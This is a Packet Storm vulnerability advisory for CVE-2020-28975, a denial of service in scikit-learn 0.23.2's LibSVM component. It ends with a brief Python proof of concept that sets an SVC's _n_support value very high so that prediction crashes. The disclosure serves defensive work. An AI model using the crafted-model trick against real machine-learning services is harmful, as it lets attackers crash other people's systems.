what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SciKit-Learn 0.23.2 Denial Of Service

SciKit-Learn 0.23.2 Denial Of Service
Posted Dec 1, 2020
Authored by pabloec20

SciKit-Learn version 0.23.2 suffers from a denial of service vulnerability.

tags | exploit, denial of service
advisories | CVE-2020-28975
SHA-256 | 74ea2f94eb65fd45d7836e15053b43ffc105e3fdc927679198505c47d640629d

SciKit-Learn 0.23.2 Denial Of Service

Change Mirror Download
[Description]

svm_predict_values in svm.cpp in Libsvm v324, as used in scikit-learn
0.23.2 and other products, allows attackers to cause a denial of service
(segmentation fault) via a crafted model SVM (introduced via pickle,
json, or any other model permanence technique) with a large value in the
_n_support array.


[CVE ID]

CVE-2020-28975


[Vendor of Product]

SciKit-Learn

[Affected Product Code Base]

scikit-learn - 0.23.2

[Affected Component]

LibSVM

[Attack Type]

Local

[Impact]

Denial of Service

[Attack Vectors]

specially crafted file

[Reference]

https://github.com/scikit-learn/scikit-learn/issues/18891
<https://github.com/scikit-learn/scikit-learn/issues/18891>


https://github.com/cjlin1/libsvm/blob/9a3a9708926dec87d382c43b203f2ca19c2d56a0/svm.cpp#L2501
<https://github.com/cjlin1/libsvm/blob/9a3a9708926dec87d382c43b203f2ca19c2d56a0/svm.cpp#L2501>

[Discoverer]

pabloec20



----------
Editor's note - Steps/Code to Reproduce

from sklearn import svm
from sklearn import datasets


if __name__ == '__main__':
X,y = datasets.load_iris(return_X_y=True)
clf = svm.SVC()
clf.fit(X, y)
clf._n_support[0] = 1000000
y_pred = clf.predict(X)
Login or Register to add favorites

File Archive:

July 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    52 Files
  • 2
    Jul 2nd
    0 Files
  • 3
    Jul 3rd
    0 Files
  • 4
    Jul 4th
    0 Files
  • 5
    Jul 5th
    0 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    0 Files
  • 9
    Jul 9th
    0 Files
  • 10
    Jul 10th
    0 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close